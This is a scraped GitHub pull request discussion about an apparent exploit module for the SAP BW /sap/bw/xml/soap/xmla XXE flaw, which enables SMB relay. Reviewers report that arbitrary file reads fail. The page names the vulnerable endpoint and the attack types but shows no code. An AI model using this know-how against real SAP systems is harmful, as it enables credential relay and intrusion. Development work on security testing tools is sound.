-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
SAP /sap/bw/xml/soap/xmla XMLA service (XML DOCTYPE) SMB relay #1656
SAP /sap/bw/xml/soap/xmla XMLA service (XML DOCTYPE) SMB relay #1656
Conversation
Trying to run it against windows installation results in the next error:
|
And test results on Linux, neither access to file contents:
|
Any clues? Am I doing something wrong to test this module? |
works fine:
|
It's just the smb relay part, isn't working the XXE expansion vuln? I dont see this module complete if we can't read arbitrary remote files. |
"An attacker can attempt to generate a "denial of service" situation or start an "SMB relay attack" using Document Type Definitions (DTD) via the SOAP/XMLA interface." ref: https://service.sap.com/sap/support/notes/1597066 Any file read attempt results in error: "Request transfered is not a valid XML/SOAP document". I think this is a red herring as far as arbitrary file read goes. Unless there is some trick I'm not aware of or haven't tried.
|
This module exploits the SAP NetWeaver BW XML External Entity vulnerability. An XML External Entities (XXE) issue exists within the XMLA service (XML DOCTYPE) function. The XXE vulnerability in SAP BW can lead to arbitrary file reading or an SMBRelay attack.
SAP Note 1597066 / DSECRG-12-033.
ref: http://erpscan.com/advisories/dsecrg-12-033-sap-basis-6-407-02-xml-external-entity